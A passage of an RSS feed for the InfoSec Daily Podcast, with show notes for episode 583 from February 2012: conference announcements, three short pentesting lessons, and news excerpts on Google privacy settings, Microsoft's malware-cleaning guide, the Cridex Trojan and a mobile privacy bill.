	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &nbsp;When alerts occur during a pentest, the customer should always validate them against the pentester&#39;s IP addresses.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded is safe.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> When performing physical pentesting (sneaking in, by passing security, picking locks, etc&#8230;) ALWAYS have a good GET OUT OF JAIL FREE CARD!</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Much has been made of Google&#39;s new privacy policy, which takes effect March 1. If you&#39;re concerned about Google misusing your personal information or sharing too much of it with advertisers and others, there are plenty of ways to thwart Web trackers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But what exactly are you thwarting? You don&#39;t become anonymous when you block tracking cookies, Web beacons, and the other identifiers as you browse. Your ISP and the sites you visit still know a lot about you, courtesy of the identifying information served up automatically by your browser.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Electronic Frontier Foundation offers the Panopticlick service that rates the anonymity of your browser. The test shows you the identifiable information provided by your browser and generates a numerical rating that indicates how easy it would be to identify you based solely on your browser&#39;s fingerprint.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According the the entropy theory explained by Peter Eckersley on the EFF&#39;s DeepLinks blog, 33 bits of entropy are sufficient to identify a person. According to Eckersley, knowing a person&#39;s birth date and month (not year) and ZIP code gives you 32 bits of entropy. Also knowing the person&#39;s gender (50-50, so one bit of entropy) gets you to the identifiable threshold of 33 bits.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prominent in the Google privacy policy are links to services that let you view and manage the information you share with Google. Some of this personal data you volunteer, and some of it is collected by Google as you search, browse, and use other services.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To view everything (almost) Google knows about you, open the Google Dashboard. Here you can access all the services associated with your Google account: Gmail, Google Docs, YouTube, Picasa, Blogger, AdSense, and every other Google property. The dashboard also lets you manage your contacts, calendar, Google Groups, Web history, Google Voice account, and other services.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More importantly, you can view and edit the personal information stored by each Google service, or delete the service altogether. To see which other services have access to the account&#39;s information, click &quot;Websites authorized to access the account&quot; at the top of the Dashboard. To block an authorized service from accessing the account, click Revoke Access next to the service name.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Google Ads Preferences Manager lets you block specific advertisers or opt out of all targeted advertising. Click the &quot;Ads on the web&quot; link in the left column and then choose &quot;add or edit&quot; under &quot;Your categories and demographics&quot; to select the categories of ads you want to be served or to opt out of personalized ads.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.microsoft.com/security/sir/strategy/default.aspx#%21malwarecleaning"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.microsoft.com/security/sir/strategy/default.aspx#!malwarecleaning</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has published a 7-step guide for cleaning malware off of an infected system. &nbsp;This is a welcome contrast to Apple&rsquo;s policy of denying that OS X could ever be infected in the first place. &nbsp;The guide makes use of Microsoft&rsquo;s Sysinternals suite of tools and serves as a good basis of removing infections from any system that you don&rsquo;t want to reinstall. &nbsp;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The guidance in IT Pro Advanced Techniques helps IT professionals investigate, analyze, and&mdash;when possible&mdash;remove malware from an infected computer. This guidance, intended for advanced users, helps IT professionals understand the impact of malware and create a rudimentary roadmap for cleaning infected computers. In addition, this effort provides the user more information about the internal operation of malware.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The guidance involves the use of several</span><a href="http://www.sysinternals.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Windows Sysinternals tools</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a suite of advanced diagnostics and troubleshooting utilities for the Windows platform available for download at no charge from the Microsoft Download Center. &ldquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://searchsecurity.techtarget.com/news/2240114619/Cridex-Trojan-breaks-CAPTCHA-targets-Facebook-Twitter-users"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://searchsecurity.techtarget.com/news/2240114619/Cridex-Trojan-breaks-CAPTCHA-targets-Facebook-Twitter-users</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A variant of a banking Trojan known as Cridex can communicate with a CAPTCHA-breaking server in order to establish malicious email accounts. Researchers at Websense Security Labs posted a video documenting how Cridex broke a CAPTCHA test and opened a Yahoo email account in six attempts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Cridex network grows as it infects new machines via malicious emails. The emails contain links to a Black Hole exploit kit, which attacks vulnerabilities in Web browsers and plug-ins. If successful, the kit downloads Cridex onto the machine.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Cridex is a data-stealing Trojan that is similar to Zeus in the way it operates: It logs content from Web sessions and alters them to harvest information from the infected user,&rdquo; according to the Websense Security Labs blog.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cridex targets information from platforms like Facebook, Twitter and several online banking services. That data is then sent to a remote server.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/tech-policy/news/2012/01/mobile-device-privacy-act-would-prevent-secret-smartphone-monitoring.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/01/mobile-device-privacy-act-would-prevent-secret-smartphone-monitoring.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recent controversy sparked by the installation of monitoring software on millions of smartphones has led US Rep. Edward Markey (D-MA) to propose a requirement that carriers and phone makers inform consumers about the presence of monitoring software and gain their &quot;express consent&quot; before collecting and transmitting information from phones.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The controversy started a couple months back when a developer publicized the widespread use of Carrier IQ software, which phone manufacturers and carriers use to monitor what happens on a smartphone. While Apple, Samsung, HTC, AT&amp;T and others all said the software is used only as a diagnostics tool to improve network and service performance, congressmen started denouncing the use of Carrier IQ, and class-action lawsuits were filed. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3447/0/infosec-daily-podcast-episode-583.mp3" length="18855746" type="audio/mpeg" />
		<itunes:duration>0:39:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &#160;When alerts occur during a pentest, the customer should always validate them against the pentester&#39;s IP addresses.
	Lesson 2: When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded is safe.
	Lesson 3: When performing physical pentesting (sneaking in, by passing security, picking locks, etc&#8230;) ALWAYS have a good GET OUT OF JAIL FREE CARD!
	&#160;
Stories
Source: http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-f[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 582 &#8211; DMARC, DHSBS, USB Fixers, Skyipot, &amp; Chinese Hack Lawyers</title>
		<link>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers</link>
		<comments>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers#comments</comments>
		<pubDate>Wed, 01 Feb 2012 01:53:27 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3435</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 582 for January 31, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
